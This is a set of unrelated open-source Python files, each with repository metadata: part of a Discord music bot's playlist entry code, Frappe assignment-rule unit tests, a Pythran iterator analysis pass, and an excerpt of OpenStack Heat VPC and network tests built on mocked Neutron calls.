os.path.basename(self.filename).rsplit('.', 1)[0]), flags=re.IGNORECASE)
self.filename_thumbnail = next(
os.path.join(self.download_folder, f)
for f in os.listdir(self.download_folder) if img_pattern.search(f))
if hash:
# insert the 8 last characters of the file hash to the file name to
# ensure uniqueness
self.filename = md5sum(unhashed_fname, 8).join(
'-.').join(unhashed_fname.rsplit('.', 1))
if os.path.isfile(self.filename):
# Oh bother it was actually there.
os.unlink(unhashed_fname)
else:
# Move the temporary file to it's final location.
os.rename(unhashed_fname, self.filename)
def set_start(self, sec):
if sec > self.duration or sec < 0:
return False
self.start_seconds = sec
return True
class StreamPlaylistEntry(BasePlaylistEntry):
""" TODO """
def __init__(self, playlist, url, title, *, destination=None, **meta):
super().__init__()
self.playlist = playlist
self.url = url
self.title = title
self.destination = destination
self.duration = 0
self.meta = meta
if self.destination:
self.filename = self.destination
def __json__(self):
return self._enclose_json({
'version': 1,
'url': self.url,
'filename': self.filename,
'title': self.title,
'destination': self.destination,
'meta': {
name: {
'type': obj.__class__.__name__,
'id': obj.id,
'name': obj.name
} for name, obj in self.meta.items() if obj
}
})
@classmethod
def _deserialize(cls, data, playlist=None):
assert playlist is not None, cls._bad('playlist')
try:
# TODO: version check
url = data['url']
title = data['title']
destination = data['destination']
filename = data['filename']
meta = {}
# TODO: Better [name] fallbacks
if 'channel' in data['meta']:
channel = playlist.bot.get_channel(
data['meta']['channel']['id'])
meta['channel'] = channel or data['meta']['channel']['name']
if 'author' in data['meta']:
meta['author'] = meta['channel'].server.get_member(
data['meta']['author']['id'])
entry = cls(playlist, url, title, destination=destination, **meta)
if not destination and filename:
entry.filename = destination
return entry
except Exception as error:
LOG.error('Could not load %s', cls.__name__, exc_info=error)
# noinspection PyMethodOverriding
async def _download(self, *, fallback=False):
self._is_downloading = True
url = self.destination if fallback else self.url
try:
result = await self.playlist.downloader.extract_info(
self.playlist.loop, url, download=False)
except Exception as error:
if not fallback and self.destination:
return await self._download(fallback=True)
raise ExtractionError(error)
else:
self.filename = result['url']
# I might need some sort of events or hooks or shit
# for when ffmpeg inevitebly fucks up and i have to restart
# although maybe that should be at a slightly lower level
finally:
self._is_downloading = False
|
{
"content_hash": "e1e3ac8dfe466cc77465799bc146191d",
"timestamp": "",
"source": "github",
"line_count": 408,
"max_line_length": 99,
"avg_line_length": 36.3014705882353,
"alnum_prop": 0.5075957058942677,
"repo_name": "DiscordMusicBot/MusicBot",
"id": "6a35dac2fddfeb1753cf8a48edcdc521e895b952",
"size": "14811",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "musicbot/entry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "711"
},
{
"name": "Python",
"bytes": "260280"
}
],
"symlink_target": ""
}
|
import frappe
from frappe.test_runner import make_test_records
from frappe.tests.utils import FrappeTestCase
from frappe.utils import random_string
class TestAutoAssign(FrappeTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
frappe.db.delete("Assignment Rule")
@classmethod
def tearDownClass(cls):
frappe.db.rollback()
def setUp(self):
make_test_records("User")
days = [
dict(day="Sunday"),
dict(day="Monday"),
dict(day="Tuesday"),
dict(day="Wednesday"),
dict(day="Thursday"),
dict(day="Friday"),
dict(day="Saturday"),
]
self.days = days
self.assignment_rule = get_assignment_rule([days, days])
clear_assignments()
def test_round_robin(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test@example.com",
)
note = make_note(dict(public=1))
# check if auto assigned to second user
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test1@example.com",
)
clear_assignments()
note = make_note(dict(public=1))
# check if auto assigned to third user, even if
# previous assignments where closed
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test2@example.com",
)
# check loop back to first user
note = make_note(dict(public=1))
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test@example.com",
)
def test_load_balancing(self):
self.assignment_rule.rule = "Load Balancing"
self.assignment_rule.save()
for _ in range(30):
note = make_note(dict(public=1))
# check if each user has 10 assignments (?)
for user in ("test@example.com", "test1@example.com", "test2@example.com"):
self.assertEqual(
len(frappe.get_all("ToDo", dict(allocated_to=user, reference_type="Note"))), 10
)
# clear 5 assignments for first user
# can't do a limit in "delete" since postgres does not support it
for d in frappe.get_all(
"ToDo", dict(reference_type="Note", allocated_to="test@example.com"), limit=5
):
frappe.db.delete("ToDo", {"name": d.name})
# add 5 more assignments
for i in range(5):
make_note(dict(public=1))
# check if each user still has 10 assignments
for user in ("test@example.com", "test1@example.com", "test2@example.com"):
self.assertEqual(
len(frappe.get_all("ToDo", dict(allocated_to=user, reference_type="Note"))), 10
)
def test_based_on_field(self):
self.assignment_rule.rule = "Based on Field"
self.assignment_rule.field = "owner"
self.assignment_rule.save()
frappe.set_user("test1@example.com")
note = make_note(dict(public=1))
# check if auto assigned to doc owner, test1@example.com
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "owner"
),
"test1@example.com",
)
frappe.set_user("test2@example.com")
note = make_note(dict(public=1))
# check if auto assigned to doc owner, test2@example.com
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "owner"
),
"test2@example.com",
)
frappe.set_user("Administrator")
def test_assign_condition(self):
# check condition
note = make_note(dict(public=0))
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
None,
)
def test_clear_assignment(self):
note = make_note(dict(public=1))
# check if auto assigned to first user
todo = frappe.get_list(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), limit=1
)[0]
todo = frappe.get_doc("ToDo", todo["name"])
self.assertEqual(todo.allocated_to, "test@example.com")
# test auto unassign
note.public = 0
note.save()
todo.load_from_db()
# check if todo is cancelled
self.assertEqual(todo.status, "Cancelled")
def test_close_assignment(self):
note = make_note(dict(public=1, content="valid"))
# check if auto assigned
todo = frappe.get_list(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), limit=1
)[0]
todo = frappe.get_doc("ToDo", todo["name"])
self.assertEqual(todo.allocated_to, "test@example.com")
note.content = "Closed"
note.save()
todo.load_from_db()
# check if todo is closed
self.assertEqual(todo.status, "Closed")
# check if closed todo retained assignment
self.assertEqual(todo.allocated_to, "test@example.com")
def check_multiple_rules(self):
note = make_note(dict(public=1, notify_on_login=1))
# check if auto assigned to test3 (2nd rule is applied, as it has higher priority)
self.assertEqual(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
"test@example.com",
)
def check_assignment_rule_scheduling(self):
frappe.db.delete("Assignment Rule")
days_1 = [dict(day="Sunday"), dict(day="Monday"), dict(day="Tuesday")]
days_2 = [dict(day="Wednesday"), dict(day="Thursday"), dict(day="Friday"), dict(day="Saturday")]
get_assignment_rule([days_1, days_2], ["public == 1", "public == 1"])
frappe.flags.assignment_day = "Monday"
note = make_note(dict(public=1))
self.assertIn(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
["test@example.com", "test1@example.com", "test2@example.com"],
)
frappe.flags.assignment_day = "Friday"
note = make_note(dict(public=1))
self.assertIn(
frappe.db.get_value(
"ToDo", dict(reference_type="Note", reference_name=note.name, status="Open"), "allocated_to"
),
["test3@example.com"],
)
def test_assignment_rule_condition(self):
frappe.db.delete("Assignment Rule")
# Add expiry_date custom field
from frappe.custom.doctype.custom_field.custom_field import create_custom_field
df = dict(fieldname="expiry_date", label="Expiry Date", fieldtype="Date")
create_custom_field("Note", df)
assignment_rule = frappe.get_doc(
dict(
name="Assignment with Due Date",
doctype="Assignment Rule",
document_type="Note",
assign_condition="public == 0",
due_date_based_on="expiry_date",
assignment_days=self.days,
users=[
dict(user="test@example.com"),
],
)
).insert()
expiry_date = frappe.utils.add_days(frappe.utils.nowdate(), 2)
note1 = make_note({"expiry_date": expiry_date})
note2 = make_note({"expiry_date": expiry_date})
note1_todo = frappe.get_all(
"ToDo", filters=dict(reference_type="Note", reference_name=note1.name, status="Open")
)[0]
note1_todo_doc = frappe.get_doc("ToDo", note1_todo.name)
self.assertEqual(frappe.utils.get_date_str(note1_todo_doc.date), expiry_date)
# due date should be updated if the reference doc's date is updated.
note1.expiry_date = frappe.utils.add_days(expiry_date, 2)
note1.save()
note1_todo_doc.reload()
self.assertEqual(frappe.utils.get_date_str(note1_todo_doc.date), note1.expiry_date)
# saving one note's expiry should not update other note todo's due date
note2_todo = frappe.get_all(
"ToDo",
filters=dict(reference_type="Note", reference_name=note2.name, status="Open"),
fields=["name", "date"],
)[0]
self.assertNotEqual(frappe.utils.get_date_str(note2_todo.date), note1.expiry_date)
self.assertEqual(frappe.utils.get_date_str(note2_todo.date), expiry_date)
assignment_rule.delete()
frappe.db.commit() # undo changes commited by DDL
def clear_assignments():
frappe.db.delete("ToDo", {"reference_type": "Note"})
def get_assignment_rule(days, assign=None):
frappe.delete_doc_if_exists("Assignment Rule", "For Note 1")
if not assign:
assign = ["public == 1", "notify_on_login == 1"]
assignment_rule = frappe.get_doc(
dict(
name="For Note 1",
doctype="Assignment Rule",
priority=0,
document_type="Note",
assign_condition=assign[0],
unassign_condition="public == 0 or notify_on_login == 1",
close_condition='"Closed" in content',
rule="Round Robin",
assignment_days=days[0],
users=[
dict(user="test@example.com"),
dict(user="test1@example.com"),
dict(user="test2@example.com"),
],
)
).insert()
frappe.delete_doc_if_exists("Assignment Rule", "For Note 2")
# 2nd rule
frappe.get_doc(
dict(
name="For Note 2",
doctype="Assignment Rule",
priority=1,
document_type="Note",
assign_condition=assign[1],
unassign_condition="notify_on_login == 0",
rule="Round Robin",
assignment_days=days[1],
users=[dict(user="test3@example.com")],
)
).insert()
return assignment_rule
def make_note(values=None):
note = frappe.get_doc(dict(doctype="Note", title=random_string(10), content=random_string(20)))
if values:
note.update(values)
note.insert()
return note
|
{
"content_hash": "5ae47d73a692fefe675587260413bd30",
"timestamp": "",
"source": "github",
"line_count": 334,
"max_line_length": 98,
"avg_line_length": 27.592814371257486,
"alnum_prop": 0.6766493055555556,
"repo_name": "StrellaGroup/frappe",
"id": "8f1773608f9333144fa6759b6e2a19bd24d43be6",
"size": "9304",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "frappe/automation/doctype/assignment_rule/test_assignment_rule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "65093"
},
{
"name": "HTML",
"bytes": "250858"
},
{
"name": "JavaScript",
"bytes": "2515308"
},
{
"name": "Less",
"bytes": "10921"
},
{
"name": "Python",
"bytes": "3605011"
},
{
"name": "SCSS",
"bytes": "261492"
},
{
"name": "Vue",
"bytes": "98456"
}
],
"symlink_target": ""
}
|
"""
PotentialIterator finds if it is possible to use an iterator.
"""
from pythran.analyses.aliases import Aliases
from pythran.analyses.argument_read_once import ArgumentReadOnce
from pythran.passmanager import NodeAnalysis
import gast as ast
class PotentialIterator(NodeAnalysis):
"""Find whether an expression can be replaced with an iterator."""
def __init__(self):
self.result = set()
NodeAnalysis.__init__(self, Aliases, ArgumentReadOnce)
def visit_For(self, node):
self.result.add(node.iter)
self.generic_visit(node)
def visit_Compare(self, node):
if isinstance(node.ops[0], (ast.In, ast.NotIn)):
self.result.update(node.comparators)
self.generic_visit(node)
def visit_Call(self, node):
for i, arg in enumerate(node.args):
def isReadOnce(f, i):
return (f in self.argument_read_once and
self.argument_read_once[f][i] <= 1)
if all(isReadOnce(alias, i) for alias in self.aliases[node.func]):
self.result.add(arg)
self.generic_visit(node)
|
{
"content_hash": "2618999c605dfdaedf83d1efe158b7c0",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 78,
"avg_line_length": 32.17142857142857,
"alnum_prop": 0.6412078152753108,
"repo_name": "serge-sans-paille/pythran",
"id": "23c6b3ad30f8fc78ba01c118ecccd9bb4007911a",
"size": "1126",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pythran/analyses/potential_iterator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C++",
"bytes": "2074873"
},
{
"name": "Cython",
"bytes": "1701"
},
{
"name": "Jupyter Notebook",
"bytes": "27461"
},
{
"name": "Makefile",
"bytes": "1162"
},
{
"name": "Python",
"bytes": "2025760"
}
],
"symlink_target": ""
}
|
import uuid
from heat.common import exception
from heat.common import template_format
from heat.engine import parser
from heat.engine.resources import subnet as sn
from heat.engine import scheduler
from heat.engine import template
from heat.tests.common import HeatTestCase
from heat.tests import utils
try:
from neutronclient.common.exceptions import NeutronClientException
from neutronclient.v2_0 import client as neutronclient
except ImportError:
neutronclient = None
class VPCTestBase(HeatTestCase):
def setUp(self):
super(VPCTestBase, self).setUp()
self.m.StubOutWithMock(neutronclient.Client, 'add_interface_router')
self.m.StubOutWithMock(neutronclient.Client, 'add_gateway_router')
self.m.StubOutWithMock(neutronclient.Client, 'create_network')
self.m.StubOutWithMock(neutronclient.Client, 'create_port')
self.m.StubOutWithMock(neutronclient.Client, 'create_router')
self.m.StubOutWithMock(neutronclient.Client, 'create_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'delete_network')
self.m.StubOutWithMock(neutronclient.Client, 'delete_port')
self.m.StubOutWithMock(neutronclient.Client, 'delete_router')
self.m.StubOutWithMock(neutronclient.Client, 'delete_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'list_networks')
self.m.StubOutWithMock(neutronclient.Client, 'list_routers')
self.m.StubOutWithMock(neutronclient.Client, 'remove_gateway_router')
self.m.StubOutWithMock(neutronclient.Client, 'remove_interface_router')
self.m.StubOutWithMock(neutronclient.Client, 'show_subnet')
self.m.StubOutWithMock(neutronclient.Client, 'show_network')
self.m.StubOutWithMock(neutronclient.Client, 'show_port')
self.m.StubOutWithMock(neutronclient.Client, 'show_router')
self.m.StubOutWithMock(neutronclient.Client, 'create_security_group')
self.m.StubOutWithMock(neutronclient.Client, 'show_security_group')
self.m.StubOutWithMock(neutronclient.Client, 'list_security_groups')
self.m.StubOutWithMock(neutronclient.Client, 'delete_security_group')
self.m.StubOutWithMock(
neutronclient.Client, 'create_security_group_rule')
self.m.StubOutWithMock(
neutronclient.Client, 'delete_security_group_rule')
self.stub_keystoneclient()
def create_stack(self, templ):
t = template_format.parse(templ)
stack = self.parse_stack(t)
self.assertIsNone(stack.validate())
self.assertIsNone(stack.create())
return stack
def parse_stack(self, t):
stack_name = 'test_stack'
tmpl = template.Template(t)
stack = parser.Stack(utils.dummy_context(), stack_name, tmpl)
stack.store()
return stack
def mock_create_network(self):
self.vpc_name = utils.PhysName('test_stack', 'the_vpc')
neutronclient.Client.create_network(
{
'network': {'name': self.vpc_name}
}).AndReturn({'network': {
'status': 'BUILD',
'subnets': [],
'name': 'name',
'admin_state_up': True,
'shared': False,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'aaaa'
}})
neutronclient.Client.show_network(
'aaaa'
).AndReturn({"network": {
"status": "BUILD",
"subnets": [],
"name": self.vpc_name,
"admin_state_up": False,
"shared": False,
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"id": "aaaa"
}})
neutronclient.Client.show_network(
'aaaa'
).MultipleTimes().AndReturn({"network": {
"status": "ACTIVE",
"subnets": [],
"name": self.vpc_name,
"admin_state_up": False,
"shared": False,
"tenant_id": "c1210485b2424d48804aad5d39c61b8f",
"id": "aaaa"
}})
neutronclient.Client.create_router(
{'router': {'name': self.vpc_name}}).AndReturn({
'router': {
'status': 'BUILD',
'name': self.vpc_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'bbbb'
}})
neutronclient.Client.list_routers(name=self.vpc_name).AndReturn({
"routers": [{
"status": "BUILD",
"external_gateway_info": None,
"name": self.vpc_name,
"admin_state_up": True,
"tenant_id": "3e21026f2dc94372b105808c0e721661",
"routes": [],
"id": "bbbb"
}]
})
self.mock_router_for_vpc()
def mock_create_subnet(self):
self.subnet_name = utils.PhysName('test_stack', 'the_subnet')
neutronclient.Client.create_subnet(
{'subnet': {
'network_id': u'aaaa',
'cidr': u'10.0.0.0/24',
'ip_version': 4,
'name': self.subnet_name}}).AndReturn({
'subnet': {
'status': 'ACTIVE',
'name': self.subnet_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'cccc'}})
self.mock_router_for_vpc()
neutronclient.Client.add_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndReturn(None)
def mock_show_subnet(self):
neutronclient.Client.show_subnet('cccc').AndReturn({
'subnet': {
'name': self.subnet_name,
'network_id': 'aaaa',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'allocation_pools': [{'start': '10.0.0.2',
'end': '10.0.0.254'}],
'gateway_ip': '10.0.0.1',
'ip_version': 4,
'cidr': '10.0.0.0/24',
'id': 'cccc',
'enable_dhcp': False,
}})
def mock_create_security_group(self):
self.sg_name = utils.PhysName('test_stack', 'the_sg')
neutronclient.Client.create_security_group({
'security_group': {
'name': self.sg_name,
'description': 'SSH access'
}
}).AndReturn({
'security_group': {
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'name': self.sg_name,
'description': 'SSH access',
'security_group_rules': [],
'id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'
}
})
neutronclient.Client.create_security_group_rule({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'
}
}).AndReturn({
'security_group_rule': {
'direction': 'ingress',
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'port_range_min': '22',
'ethertype': 'IPv4',
'port_range_max': '22',
'protocol': 'tcp',
'security_group_id': '0389f747-7785-4757-b7bb-2ab07e4b09c3',
'id': 'bbbb'
}
})
def mock_show_security_group(self, group=None):
sg_name = utils.PhysName('test_stack', 'the_sg')
group = group or '0389f747-7785-4757-b7bb-2ab07e4b09c3'
if group == '0389f747-7785-4757-b7bb-2ab07e4b09c3':
neutronclient.Client.show_security_group(group).AndReturn({
'security_group': {
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'name': sg_name,
'description': '',
'security_group_rules': [{
'direction': 'ingress',
'protocol': 'tcp',
'port_range_max': '22',
'id': 'bbbb',
'ethertype': 'IPv4',
'security_group_id': ('0389f747-7785-4757-b7bb-'
'2ab07e4b09c3'),
'remote_group_id': None,
'remote_ip_prefix': '0.0.0.0/0',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'port_range_min': '22'
}],
'id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'}})
elif group == 'INVALID-NO-REF':
neutronclient.Client.show_security_group(group).AndRaise(
NeutronClientException(status_code=404))
elif group == 'RaiseException':
neutronclient.Client.show_security_group(
'0389f747-7785-4757-b7bb-2ab07e4b09c3').AndRaise(
NeutronClientException(status_code=403))
def mock_delete_security_group(self):
self.mock_show_security_group()
neutronclient.Client.delete_security_group_rule(
'bbbb').AndReturn(None)
neutronclient.Client.delete_security_group(
'0389f747-7785-4757-b7bb-2ab07e4b09c3').AndReturn(None)
def mock_router_for_vpc(self):
neutronclient.Client.list_routers(name=self.vpc_name).AndReturn({
"routers": [{
"status": "ACTIVE",
"external_gateway_info": {
"network_id": "zzzz",
"enable_snat": True},
"name": self.vpc_name,
"admin_state_up": True,
"tenant_id": "3e21026f2dc94372b105808c0e721661",
"routes": [],
"id": "bbbb"
}]
})
def mock_delete_network(self):
self.mock_router_for_vpc()
neutronclient.Client.delete_router('bbbb').AndReturn(None)
neutronclient.Client.delete_network('aaaa').AndReturn(None)
def mock_delete_subnet(self):
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndReturn(None)
neutronclient.Client.delete_subnet('cccc').AndReturn(None)
def mock_create_route_table(self):
self.rt_name = utils.PhysName('test_stack', 'the_route_table')
neutronclient.Client.create_router({
'router': {'name': self.rt_name}}).AndReturn({
'router': {
'status': 'BUILD',
'name': self.rt_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'ffff'
}
})
neutronclient.Client.show_router('ffff').AndReturn({
'router': {
'status': 'BUILD',
'name': self.rt_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'ffff'
}
})
neutronclient.Client.show_router('ffff').AndReturn({
'router': {
'status': 'ACTIVE',
'name': self.rt_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'ffff'
}
})
self.mock_router_for_vpc()
neutronclient.Client.add_gateway_router(
'ffff', {'network_id': 'zzzz'}).AndReturn(None)
def mock_create_association(self):
self.mock_show_subnet()
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
'bbbb',
{'subnet_id': u'cccc'}).AndReturn(None)
neutronclient.Client.add_interface_router(
u'ffff',
{'subnet_id': 'cccc'}).AndReturn(None)
def mock_delete_association(self):
self.mock_show_subnet()
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
'ffff',
{'subnet_id': u'cccc'}).AndReturn(None)
neutronclient.Client.add_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndReturn(None)
def mock_delete_route_table(self):
neutronclient.Client.delete_router('ffff').AndReturn(None)
neutronclient.Client.remove_gateway_router('ffff').AndReturn(None)
def assertResourceState(self, resource, ref_id):
self.assertIsNone(resource.validate())
self.assertEqual((resource.CREATE, resource.COMPLETE), resource.state)
self.assertEqual(ref_id, resource.FnGetRefId())
class VPCTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
'''
def mock_create_network_failed(self):
self.vpc_name = utils.PhysName('test_stack', 'the_vpc')
neutronclient.Client.create_network(
{
'network': {'name': self.vpc_name}
}).AndRaise(NeutronClientException())
def test_vpc(self):
self.mock_create_network()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
vpc = stack['the_vpc']
self.assertResourceState(vpc, 'aaaa')
scheduler.TaskRunner(vpc.delete)()
self.m.VerifyAll()
def test_vpc_delete_successful_if_created_failed(self):
self.mock_create_network_failed()
self.m.ReplayAll()
t = template_format.parse(self.test_template)
stack = self.parse_stack(t)
scheduler.TaskRunner(stack.create)()
self.assertEqual(stack.state, (stack.CREATE, stack.FAILED))
scheduler.TaskRunner(stack.delete)()
self.m.VerifyAll()
class SubnetTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
'''
def test_subnet(self):
self.mock_create_network()
self.mock_create_subnet()
self.mock_delete_subnet()
self.mock_delete_network()
# mock delete subnet which is already deleted
self.mock_router_for_vpc()
neutronclient.Client.remove_interface_router(
u'bbbb',
{'subnet_id': 'cccc'}).AndRaise(
NeutronClientException(status_code=404))
neutronclient.Client.delete_subnet('cccc').AndRaise(
NeutronClientException(status_code=404))
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
subnet = stack['the_subnet']
self.assertResourceState(subnet, 'cccc')
self.assertRaises(
exception.InvalidTemplateAttribute,
subnet.FnGetAtt,
'Foo')
self.assertEqual('moon', subnet.FnGetAtt('AvailabilityZone'))
scheduler.TaskRunner(subnet.delete)()
subnet.state_set(subnet.CREATE, subnet.COMPLETE, 'to delete again')
scheduler.TaskRunner(subnet.delete)()
scheduler.TaskRunner(stack['the_vpc'].delete)()
self.m.VerifyAll()
def _mock_create_subnet_failed(self):
self.subnet_name = utils.PhysName('test_stack', 'the_subnet')
neutronclient.Client.create_subnet(
{'subnet': {
'network_id': u'aaaa',
'cidr': u'10.0.0.0/24',
'ip_version': 4,
'name': self.subnet_name}}).AndReturn({
'subnet': {
'status': 'ACTIVE',
'name': self.subnet_name,
'admin_state_up': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'id': 'cccc'}})
neutronclient.Client.show_network(
'aaaa'
).MultipleTimes().AndRaise(NeutronClientException(status_code=404))
def test_create_failed_delete_success(self):
self._mock_create_subnet_failed()
neutronclient.Client.delete_subnet('cccc').AndReturn(None)
self.m.ReplayAll()
t = template_format.parse(self.test_template)
tmpl = parser.Template(t)
stack = parser.Stack(utils.dummy_context(), 'test_subnet_', tmpl,
stack_id=str(uuid.uuid4()))
tmpl.t['Resources']['the_subnet']['Properties']['VpcId'] = 'aaaa'
resource_defns = tmpl.resource_definitions(stack)
rsrc = sn.Subnet('the_subnet',
resource_defns['the_subnet'],
stack)
rsrc.validate()
self.assertRaises(exception.ResourceFailure,
scheduler.TaskRunner(rsrc.create))
self.assertEqual((rsrc.CREATE, rsrc.FAILED), rsrc.state)
ref_id = rsrc.FnGetRefId()
self.assertEqual(u'cccc', ref_id)
self.assertIsNone(scheduler.TaskRunner(rsrc.delete)())
self.assertEqual((rsrc.DELETE, rsrc.COMPLETE), rsrc.state)
self.m.VerifyAll()
class NetworkInterfaceTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_sg:
Type: AWS::EC2::SecurityGroup
Properties:
VpcId: {Ref: the_vpc}
GroupDescription: SSH access
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: "22"
ToPort: "22"
CidrIp: 0.0.0.0/0
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
GroupSet:
- Ref: the_sg
'''
test_template_no_groupset = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
'''
test_template_error = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_sg:
Type: AWS::EC2::SecurityGroup
Properties:
VpcId: {Ref: the_vpc}
GroupDescription: SSH access
SecurityGroupIngress:
- IpProtocol: tcp
FromPort: "22"
ToPort: "22"
CidrIp: 0.0.0.0/0
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
GroupSet:
- Ref: INVALID-REF-IN-TEMPLATE
'''
test_template_error_no_ref = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties: {CidrBlock: '10.0.0.0/16'}
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_nic:
Type: AWS::EC2::NetworkInterface
Properties:
PrivateIpAddress: 10.0.0.100
SubnetId: {Ref: the_subnet}
GroupSet:
- INVALID-NO-REF
'''
def mock_create_network_interface(
self, security_groups=['0389f747-7785-4757-b7bb-2ab07e4b09c3']):
self.nic_name = utils.PhysName('test_stack', 'the_nic')
port = {'network_id': 'aaaa',
'fixed_ips': [{
'subnet_id': u'cccc',
'ip_address': u'10.0.0.100'
}],
'name': self.nic_name,
'admin_state_up': True}
if security_groups:
port['security_groups'] = security_groups
neutronclient.Client.create_port({'port': port}).AndReturn({
'port': {
'admin_state_up': True,
'device_id': '',
'device_owner': '',
'fixed_ips': [
{
'ip_address': '10.0.0.100',
'subnet_id': 'cccc'
}
],
'id': 'dddd',
'mac_address': 'fa:16:3e:25:32:5d',
'name': self.nic_name,
'network_id': 'aaaa',
'status': 'ACTIVE',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f'
}
})
def mock_show_network_interface(self):
self.nic_name = utils.PhysName('test_stack', 'the_nic')
neutronclient.Client.show_port('dddd').AndReturn({
'port': {
'admin_state_up': True,
'device_id': '',
'device_owner': '',
'fixed_ips': [
{
'ip_address': '10.0.0.100',
'subnet_id': 'cccc'
}
],
'id': 'dddd',
'mac_address': 'fa:16:3e:25:32:5d',
'name': self.nic_name,
'network_id': 'aaaa',
'security_groups': ['0389f747-7785-4757-b7bb-2ab07e4b09c3'],
'status': 'ACTIVE',
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f'
}
})
def mock_delete_network_interface(self):
neutronclient.Client.delete_port('dddd').AndReturn(None)
def test_network_interface(self):
self.mock_create_security_group()
self.mock_create_network()
self.mock_create_subnet()
self.mock_show_subnet()
